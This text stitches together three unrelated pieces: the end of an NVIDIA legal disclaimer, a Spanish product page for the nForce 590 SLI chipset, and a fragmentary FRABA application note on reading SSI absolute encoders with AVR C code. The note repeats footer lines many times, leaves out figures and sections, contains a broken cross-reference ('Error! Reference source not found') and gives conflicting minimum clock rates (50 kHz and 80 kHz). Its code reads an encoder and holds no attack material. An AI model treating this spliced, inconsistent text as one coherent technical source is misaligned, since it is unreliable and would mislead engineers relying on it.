conditions with regards to the purchase of the NVIDIA product referenced in this document. No contractual obligations are formed either directly or indirectly by this document.NVIDIA products are not designed, authorized, or warranted to be suitable for use in medical, military, aircraft, space, or life support equipment, nor in applications where failure or malfunction of the NVIDIA product can reasonably be expected to result in personal injury, death, or property or environmental damage. NVIDIA accepts no liability for inclusion and/or use of NVIDIA products in such equipment or applications and therefore such inclusion and/or use is at customer’s own risk.NVIDIA makes no representation or warranty that products based on this document will be suitable for any specified use. Testing of all parameters of each product is not necessarily performed by NVIDIA. It is customer’s sole responsibility to evaluate and determine the applicability of any information contained in this document, ensure the product is suitable and fit for the application planned by customer, and perform the necessary testing for the application in order to avoid a default of the application or the product. Weaknesses in customer’s product designs may affect the quality and reliability of the NVIDIA product and may result in additional or different conditions and/or requirements beyond those contained in this document. NVIDIA accepts no liability related to any default, damage, costs, or problem which may be based on or attributable to: (i) the use of the NVIDIA product in any manner that is contrary to this document or (ii) customer product designs.No license, either expressed or implied, is granted under any NVIDIA patent right, copyright, or other NVIDIA intellectual property right under this document. Information published by NVIDIA regarding third-party products or services does not constitute a license from NVIDIA to use such products or services or a warranty or endorsement thereof. Use of such information may require a license from a third party under the patents or other intellectual property rights of the third party, or a license from NVIDIA under the patents or other intellectual property rights of NVIDIA.Reproduction of information in this document is permissible only if approved in advance by NVIDIA in writing, reproduced without alteration and in full compliance with all applicable export laws and regulations, and accompanied by all associated conditions, limitations, and notices.THIS DOCUMENT AND ALL NVIDIA DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESSED, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND EXPRESSLY DISCLAIMS ALL IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A PARTICULAR PURPOSE. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO EVENT WILL NVIDIA BE LIABLE FOR ANY DAMAGES, INCLUDING WITHOUT LIMITATION ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THE THEORY OF LIABILITY, ARISING OUT OF ANY USE OF THIS DOCUMENT, EVEN IF NVIDIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. Notwithstanding any damages that customer might incur for any reason whatsoever, NVIDIA’s aggregate and cumulative liability towards customer for the products described herein shall be limited in accordance with the Terms of Sale for the product.TrademarksNVIDIA, the NVIDIA logo, and Mellanox are trademarks and/or registered trademarks of Mellanox Technologies Ltd. and/or NVIDIA Corporation in the U.S. and in other countries. The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world¬wide basis. Other company and product names may be trademarks of the respective companies with which they are associated.Copyright© 2023 NVIDIA Corporation & affiliates. All rights reserved.NVIDIA Corporation | 2788 San Tomas Expressway, Santa Clara, CA 95051。

Características y ventajasMCP NVIDIA nForce® 590 SLIPensado para entusiastasLos procesadores de comunicaciones y contenidos multimedia (MCP) NVIDIA nForce® 590 SLI™ proporcionan todas las herramientas y el rendimiento que necesitan los frikis del PC. Si se combinan con determinadas tarjetas gráficas NVIDIA GeForce y otros componentes del sistema, la velocidad del bus aumenta de forma dinámica. Además, ofrecen funciones de overclocking y mayor rapidez en la transmisión de datos.Tecnología NVIDIA LinkBoost™El MCP nForce 590 SLI incrementa automáticamente el ancho de banda cuando detecta la presencia de determinadas tarjetas gráficas NVIDIA® GeForce®.Diseñado para NVIDIA® SLI™La tecnología NVIDIA SLI es una innovación revolucionaria que permite aumentar drásticamente el rendimiento gráfico combinando varias GPU NVIDIA en un mismo sistema dotado de un MCP NVIDIA nForce SLI.Componentes con certificación NVIDIA SLICuando se combinan ciertos componentes (como determinadas GPU NVIDIA® GeForce® y memorias del sistema) con placas basadas en el MCP nForce 590 SLI, se incrementa automáticamente la velocidad del bus del sistema. Si quieres información sobre los componentes con certificación SLI, visita \nForce.Dos enlaces PCI Express SLI x16El ancho de banda de los dos enlaces PCI Express de 16 vías garantiza el máximo rendimiento gráfico para los juegos y las GPU de última generación. Multiplica por dos el ancho de banda de las soluciones PCI Express SLI x8.Almacenamiento MediaShield™ de NVIDIAConjunto de funciones que mantiene a salvo la información digital. Siempre fiable, escalable y accesible. Incluye soporte de configuraciones RAID y unidades de disco SATA.Configuración de varios discosUn sencillo asistente ayuda a configurar fácilmente las unidades de disco para obtener mayor protección de los datos, un acceso más rápido a los discos o máxima capacidad de almacenamiento.MediaShield selecciona automáticamente la configuración RAID 0, 1, 0+1 o 5 en función de tus necesidades. Los más expertos pueden manejar las opciones RAID directamente si lo prefieren.Sistema de alerta de discosSi falla alguno de los discos, MediaShield presenta una imagen en la que señala el disco defectuoso para facilitar su identificación, sustitución y recuperación.Migración de nivel RAID (morphing)MediaShield ofrece al usuario la posibilidad de cambiar la configuración RAID existente por otra configuración en un solo paso denominado cambio de nivel o morphing. Esto elimina la necesidad de hacer la copia de seguridad de los datos y efectuar los numerosos pasos que conllevaría el proceso manual.Matriz de discos de arranqueLas funciones MediaShield permiten utilizar una matriz de discos para cargar el sistema operativo al arranque.Seis unidades de disco SATA 3Gb/sPosibilidad de combinar hasta 6 unidades SATA en un volumen para obtener configuraciones RAID más rápidas y de mayor capacidad. La presencia de más discos significa más opciones de configuración, lo que incluye, por ejemplo, dos matrices RAID 5 o 6 unidades RAID 0 (striping) para obtener máxima velocidad de acceso a los datos. Además, el soporte de unidades SATA-2 3Gb/s permite aprovechar ventajas como las funciones de conexión en caliente y reordenación de colas de comandos (Native Command Queuing y Tagged Command Queuing). Las colas de comandos nativas aumentan la eficacia del acceso a los discos en entornos multithread porque permiten mantener las operaciones de lectura/escritura en espera para ejecutarlas en el orden más conveniente.Comunicación en red con NVIDIA nForceLa tecnología de red de NVIDIA proporciona la máxima velocidad de transmisión con el menor índice de utilización de la CPU. Además de ser extraordinariamente estable y manejable, esta solución facilita la administración de la red y reduce el coste total de propiedad. Sólo NVIDIA integra este nivel de funcionalidad de red para llevar la comunicación online a otra dimensión.Gigabit Ethernet nativo de NVIDIALa máxima velocidad existente en conexiones Gigabit Ethernet. Elimina los cuellos de botella y mejora la eficacia global del sistema.Tecnología NVIDIA FirstPacket™Conviértete en el “rey del ping” con la tecnología FirstPacket de NVIDIA. Tendrás la mejor calidad de comunicación en tus llamadas telefónicas y todo el rendimiento que necesitas al jugar online.FirstPacket garantiza que los datos de los juegos, las comunicaciones de voz sobre IP (VoIP) y las transferencias de archivos de gran tamaño se gestionarán de acuerdo con las preferencias que tú establezcas a través de un sencillo asistente de configuración.Tecnología NVIDIA DualNet®Duplica la capacidad de tus comunicaciones en red con las dos conexiones Gigabit Ethernet integradas en el MCP NVIDIA nForce 500.Combinación de las dos conexiones Gigabit EthernetLa combinación de ambas conexiones permite sumar su capacidad para duplicar el ancho de banda Ethernet y, de esta forma, poder transferir grandes cantidades de datos desde el servidor de archivos a otros PC. Además, proporciona redundancia gracias al cambio automático de enlace en caso de fallo (failover).Aceleración de las funciones TCP/IPOfrece el máximo rendimiento del sistema al realizar mediante hardware el trabajo de filtrado de paquetes normalmente reservado a la CPU, lo que proporciona un entorno de red más rápido. Utilidad NVIDIA nTune™ 4.0La nueva versión de esta utilidad Windows incluye más opciones para optimizar el rendimiento. nTune permite ajustar manual o automáticamente los parámetros del sistema para conseguir el rendimiento deseado. Una vez realizada la configuración, la utilidad elige automáticamente los parámetros adecuados para la aplicación que se ejecute basándose en las reglas personales y los perfiles definidos por el usuario.PCI ExpressDiseñado para funcionar con el bus PCI Express. Este bus duplica el ancho de banda del bus AGP 8X, lo que proporciona una velocidad superior a 4 GB/s en las transferencias de datos en ambas direcciones.Audio de alta definición (HDA)El audio de alta definición introduce en el PC la calidad de sonido de los equipos electrónicos de consumo. Con HDA, los sistemas pueden proporcionar un extraordinario sonido de 192 kHz/32 bits a través de ocho canales que admiten los nuevos formatos de audio.USB 2.0Interfaz estándar que proporciona conexión inmediata con los dispositivos USB.。

IMPLEMENTATIONOFSSI MASTER INTERFACE APPLICATION NOTEJULY 9TH, 2010Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTET A B L E O F C O N T E N T STABLE OF CONTENTS (3)TABLE OF FIGURES (4)INTRODUCTION (5)1. SSI THEORY (6)2. SSI HARDWARE (10)Simple SSI Master Implementation (10)SSI Interface with Opto-coupler ( Galvanic Insulated) (11)Illustration of SSI Transfers using differential signals (12)3. SSI software (13)3.1 SSI Interface Using I/O Ports (13)3.2 Reading SSI with the SPI Port (15)3.3 Evaluating the data word (16)3.3.1 Separating Single Turn and Multi Turn values (17)3.3.2 Calculating an Angle from the Single Turn Value (19)Appendix a: complete software (21)Appendix B: References (26)History of changes (26)FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTET A B L E O F F I G U R E SFigure 1.0: SSI Logo (5)Figure 1.1: Simple SSI Block Diagram (6)Figure 1.2: SSI Timing Diagram (7)Figure 1.3: Multiple Transmissions in SSI Interface (8)Figure 1.4: Real World SSI Transfer (9)Figure 2.1: Simple SSI Master (10)Figure 2.2: SSI with Opto-coupler (Galvanic Insulated) (11)Figure 2.3: SSI transfer with differential signals (12)Figure 2.4: SSI transfer when encoder not connected (12)Figure 3.1: Code Example for Reading SSI Data by pin toggling (13)Figure 3.2: Transmission with Pin Toggle (14)Figure 3.3: Code Example: Main routine contains delay (14)Figure 3.4: Code Example: Using the SPI to read SSI data (15)Figure 3.5: SSI transfer using SPI (16)Figure 3.6: Code Example 4.4: Extracting Multi Turn and Single Turn values (17)Figure 3.7: Data Transfer (port toggling method) (17)Figure 3.8: Screenshot of Evaluation Result (18)Figure 3.9: Code Example: Extracting Multi Turn and Single Turn values (19)Figure 3.10: Screenshot with Angle Result (20)FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTEAn ideal SSI timing diagram can be found below, in figure 1.2.Figure 1.2: SSI Timing DiagramThe time ‘tm’ represents the transfer timeout. This is the time required by the encoder to recognize that a transfer is complete. ‘tp’ is called the pause time or the time delay between two consecutive clock sequences. It should always be greater than 21 µs, a maximum time is not defined.In idle state, encoder data line stays HIGH . After the first falling edge of the clock, the the position value of the encoder is still held constant with the Data Level still remaining in HIGH state.. With the first rising edge, the first bit, the MSB is transmitted each rising clock edge will trigger the transmit of a bit. Finally when the LSB is transferred (end of transmission) an additional rising clock will set the data output to LOW level. This will be held low for 20 ±1 µs (monoflop time). After the time is over the encoder will start to update the position value continuously and the data line is set to HIGH state. The next transmission is started with a train of clock pulses.The maximum clock frequency can be to 2MHz or higher (period of 500ns). The minimum clock frequency is 50 KHz. This value is determined by the timeout definition. For example, a timeout time of 20 ±1 µs corresponds to 50 KHz.FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTEMost of the SSI-devices implement multiple transmissions. Multiple transmission can be used to improve transfer safety by repeatedly reading the data word. The encoder will not update the data word before SSI timeout occurs. This has the consequence, that the encoder will always update its actual value into the output of the shift register. If it is continuously clocked, it leads to multiple transmissions of the same position data without updating. The two data words can be compared inside the SSI Master to recognize transmission errors,Figure 1.3: Multiple Transmissions in SSI InterfaceHowever, after n clocks (where ‘n’ is the resolution of the encoder), the following rising clock cycle (n+1) will set the data output to LOW level. If the master continues providing a clock signal, without waiting the transfer timeout,, the encoder repeats the data word starting with the MSB. ‘tw” should always be maintained less than 19 µs.Note that no particular start or stop sequence is required. The master simply starts clocking and stops when all necessary bits have been transferred. The clock rate should be more than the minimum clock rate of 80 KHZ and should not exceed 2MHz. The transfer pause between consecutive transfers has to be taken into account for updating the next position value. A running transmission can be interrupted at any time by just stopping the clock. The Slave than will recognize it after the tm time and just start to update it`s value.FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTETo understand the SSI interface based transfer more clearly, a real world illustration has been used.Figure 1.4: Real World SSI TransferThe above figure shows a real world example of a single transfer. The data word transferred is binary 0000 0000 1001 0110 1110 1010 or hex 0x00096EA. The interpretation of this value is device and sometimes configuration specific.Now we can clearly see that the data transmission stays HIGH until the first rising edge. At the first rising edge, DTA (the data transmission line) starts to transmit the data. Similarly, the transmission of data is completed by the last but one transmission edge ( ‘n th’ rising edge) and the next rising edge of the clock sets the DTA to LOW. Since the last bit transferred is 0, the timeout of the signal, 20µs is clearly visible.FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001D0D1D3D2Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTEFRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001 Illustration of SSI Transfers using differential signalsFigure 2.3, shows DTA and CLK at the microcontroller (Ch #1 and Ch #2) and the differential signals to the decoder (D1, D2) and from the encoder (D3, D4).Figure2.3: SSI transfer with differential signalsWhen no encoder is connected, the receiver signals (DTA+ and DTA-) will be open. With the circuit shown in Figure 2.2, the following signals result:Figure 2.4: SSI transfer when encoder not connectedThe clock signal from the SSI master is present as usual, but both input lines (D2 and D3) are low. Since this means the LED inside the opto-coupler is not driven, the pull-up resistor at the output of the opto-coupler will return a high signal to the microcontroller (Channel #2).Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001This code results in the following transmission shown in Error! Reference source not found.:Figure 3.22: Transmission with Pin TogglePhone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Figure 3.5: SSI transfer using SPIPhone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Figure 3.7: Data Transfer (port toggling method)Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTEFigure 3.10: Screenshot with Angle ResultThe code example in Figure 3.9 generates the above sequence. We can continuously monitor the angular value of the encoder.FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988Phone +65 6829 2348, Fax +65 6829 2121, www.fraba.sg, info@fraba.sg, Deutsche Bank AG Singapore, Bank Code: 7463, Branch Code: 001IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTEA P P E N D I X A:C O M P L E T E S O F T W A R EIn addition to the functions already shown above, this code contains the routines used to write the data from the encoder to the UART port of the ATmega88. This data was then captured using Microsoft’s Hyperterminal software./*MH**************************************************************************** Module desc: SSI demo main file* (c) Copyright Fraba-Posital 2010* History:* 15Mar2010pme: created******************************************************************************//*IN************************************************************************** Include files *****************************************************************************************************************************************/#include <avr/io.h>#include <stdio.h>#include <stdint.h>/*TD************************************************************************** Type definitions****************************************************************************************************************************************//* add the missing type definitions for standard types */typedef unsigned char uint8_t;typedef signed char int8_t;/*// these are defined in stdint.htypedef unsigned short uint16_t;typedef signed short int16_t;*/typedef unsigned long uint32_t;typedef signed long int32_t;/*LC************************************************************************** Local constants and macros *****************************************************************************************************************************/#define USE_PIN_TOGGLING// defines, so we can change the SSI ports as necessary#define SSI_CLK_BIT 5#define SSI_CLK_PORT PORTB#define SSI_CLK_DDR DDRB#define SSI_DTA_PORT PIND#define SSI_DTA_BIT 0#define SSI_DTA_DIR DDRD#define SPI_MOSI_BIT 3#define SPI_MISO_BIT 4#define SPI_SS_BIT 2#define SPI_SCK_BIT 5// RS232 pins#define RS232_CTS 4 /* Port D4 */#define RS232_RXD 0 /* Port D0 */#define RS232_TXD 1 /* Port D1 */FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTE// RS232 baud rate (assuming 8.0MHz internal RC oscillator)#define UART_BAUDRATE_9k6 51 // UBRR0L = 51; // 8.0e6/(16*9600)-1; 9600 Baud #define UART_BAUDRATE_19200 25 // UBRR0L = 25; // 8.0e6/(16*19200)-1; 19200 Baud #define UART_BAUDRATE_38400 12 // UBRR0L = 12; // 38400 Baud/*--------------------------- C O D E A R E A ------------------------------*//*FH************************************************************************** Name: pinToggleReadSSI* Parameters: -* Return value: value read from SSI* Description: read a 25 Bit SSI word using pin toggling*****************************************************************************/uint32_t pinToggleReadSSI( void ){uint8_t bit_count;uint32_t u32result = 0;uint8_t u8portdata;for (bit_count=0; bit_count<25; bit_count++){// falling edge on clock portSSI_CLK_PORT &= ~(1 << SSI_CLK_BIT);// left-shift the current resultu32result = (u32result << 1);// read the port datau8portdata = SSI_DTA_PORT;// rising edge on clock port, data changesSSI_CLK_PORT |= (1 << SSI_CLK_BIT);// evaluate the port data (port set or clear)if ( (u8portdata & (1 << SSI_DTA_BIT)) != 0){// bit is set, set LSB of resultu32result = u32result | 0x01;} // if} // forreturn u32result;} // pinToggleReadSSI/*FH************************************************************************** Name: spiInit* Parameters: -* Return value: -* Description: init SPI as master for use with SSI*****************************************************************************/void spiInit( void ){// configure SCK, MOSI and Slave Select as outputDDRB = (1 << SPI_SCK_BIT) | (1 << SPI_MOSI_BIT) | (1 << SPI_SS_BIT);// configure SPI as master, with CLK idle highSPCR = (1 << SPE) | (1 << MSTR) | (1 << CPOL);} // spiInitFRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTE/*FH************************************************************************** Name: spiReadSSI* Parameters: -* Return value: value read from SSI* Description: read a 25 Bit SSI word using the SPI interface*****************************************************************************/uint32_t spiReadSSI( void ){uint8_t u8byteCount;uint8_t u8data;uint32_t u32result = 0;for (u8byteCount=0; u8byteCount<4; u8byteCount++){// send a dummy byte, read the resultSPDR = 0xFF; // send 0xFF as dummyu32result <<= 8; // left shift the result so farwhile ( (SPSR & (1 << SPIF)) == 0); // wait until transfer completeu8data = SPDR; // read data from SPI registeru32result |= u8data; // and 'or' it with the result word }u32result >>= 7; // throw aways the LSBsreturn u32result;} // spiReadSSI/*FH************************************************************************** Name: rs232Init* Parameters: -* Return value: -* Description: initialize rs232 port pins and peripheral*****************************************************************************/void rs232Init( void ){// enable the port pullups for RS232PORTD |= (1 << RS232_RXD) | (1 << RS232_TXD) | (1 << RS232_CTS);// set port directionsDDRD |= (1 << RS232_TXD);// enable rs232 portUBRR0L = UART_BAUDRATE_38400; // Set BaudrateUCSR0A = 0x40; // clear TXCE bit, set everything else to 0UCSR0B = 0x18; // enable receiver and transmitterUCSR0C = 0x86; // no parity, 8bits} // rs232InitFRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTE/*FH************************************************************************* * Name: rs232send* Parameters: cbuffer - pointer to 0-terminated string (char buffer)* Return value: -* Description: sends the string by rs232*****************************************************************************/ void rs232send( char *cbuffer ){while (*cbuffer!= 0){UDR0 = *cbuffer;cbuffer++;asm( " wdr" );while ( ( UCSR0A & ( 1<< UDRE0)) == 0 );}} // rs232send/*FH************************************************************************* * Name: main* Parameters: -* Return value: -* Description: entry point and main loop*****************************************************************************/ int main(){int i;uint32_t u32ssiResult;uint16_t u16aux;uint16_t u16singleTurn;uint16_t u16multiTurn;char cBuffer[32];double dAngle;// init the rs232 interface to the PCrs232Init(); asm (" wdr ");rs232send( "Hello\n" ); asm (" wdr ");#ifdef USE_PIN_TOGGLING// enable clock output, set to highSSI_CLK_DDR |= (1 << SSI_CLK_BIT); // CLK is outputSSI_CLK_PORT |= (1 << SSI_CLK_BIT); // set to high (idle state)#elsespiInit();#endif// forever loopfor (;;){// get the SSI word#ifdef USE_PIN_TOGGLINGu32ssiResult = pinToggleReadSSI();#elseu32ssiResult = spiReadSSI();#endif// extract single and multiturn values from the data wordu16singleTurn = u32ssiResult & 0x0FFF;u16multiTurn = (u32ssiResult >> 12) & 0x0FFF;// calculate the single turn angledAngle = (double) u16singleTurn; // make the value floating pointdAngle = 360.0 * dAngle / 4096.0; // calculate actual angle// send the entire unmodified 32bit word to the PC in hex formatFRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTErs232send( "Raw value: " );u16aux = (u32ssiResult >> 16);sprintf( cBuffer, "0x%04x", u16aux );rs232send( cBuffer );u16aux = (u32ssiResult & 0xFFFF);sprintf( cBuffer, "%04x ", u16aux );rs232send( cBuffer );rs232send( "MT part " );sprintf( cBuffer, "0x%04x ", u16multiTurn );rs232send( cBuffer );rs232send( "ST part " );sprintf( cBuffer, "0x%04x ", u16singleTurn );rs232send( cBuffer );// we do not have sprintf for float, so first print the integer partu16aux = (uint16_t) dAngle;rs232send( "Angle " );sprintf( cBuffer, "%u", u16aux );rs232send( cBuffer );// then calculate two decimal places of the fractional partdAngle = (dAngle - u16aux) * 100;u16aux = (uint16_t) dAngle;sprintf( cBuffer, ".%u", u16aux );rs232send( cBuffer );// send CR/LFrs232send( "\r\n" );// delay at least 25µs for SSI timeoutfor (i=0; i<1000; i++){asm( " nop " ); // prevents the optimizer from removing the loop }}}/**************************************************************************** * End of source module*****************************************************************************/FRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988IMPLEMENTATION OF SSI MASTER INTERFACEAPPLICATION NOTEA P P E N D I X B:R E F E R E N C E S[1] Atmel, ATmega88 datasheet[2] Maxim, Max1486 datasheetH I S T O R Y O F C H A N G E S•March 15th , 2010: First Version•July 9th,2010: Second VersionFRABA Pte. Ltd.8 Temasek Boulevard, #42-10 Suntec Tower Three, Singapore 038988。